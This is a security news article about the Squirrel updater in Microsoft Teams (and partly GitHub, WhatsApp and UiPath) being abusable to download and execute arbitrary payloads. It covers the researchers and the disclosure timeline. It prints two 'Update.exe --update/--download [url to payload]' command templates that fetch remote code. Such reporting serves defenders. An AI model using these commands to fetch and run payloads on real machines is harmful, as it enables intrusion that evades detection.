The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system.
The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers but it can be used only to download a payload.
These applications rely on the open source
Squirrel project to manage installation and updating routines, which uses
NuGet package manager to create the necessary files.
Multiple security researchers discovered that using the 'update' command for a vulnerable application it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.'
With Microsoft Teams, a payload is added to its folder and executed automatically using either of the following commands:
Update.exe --update [url to payload] The commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.
Update.exe --download [url to payload] The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts (
LOLBAS ) database on GitHub, directly accessible
here and
here .
Reverse engineer
Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software.
Trying to replicate the effect with GitHub, and WhatsApp, and UiPath did not achieve execution for the payload and only downloading it from a remote server was possible.
"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.
Rooting for the blue team, Richard wanted to keep the details private until Microsoft Teams made the details public before Microsoft released a patch.
Another researcher playing for the red team,
Mr. Un1k0d34 of the
RingZer0 Team, had found the issue and published the details.
In
a thread on Twitter, Richard explains the process of finding the bug and its root. He started
from previous research published in late March by
Hexacorn , which focused on living-of-the-land binaries (lolbins) in Electron-based apps.
Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a
blog post from the researcher.
VIDEO Microsoft Teams is intended for business use as it is a step up from Skype for Business. It is an alternative to Slack and offers unified communications with video meeting, file storage, and collaboration features. Its supports extensions for integration with products from other developers.
source 
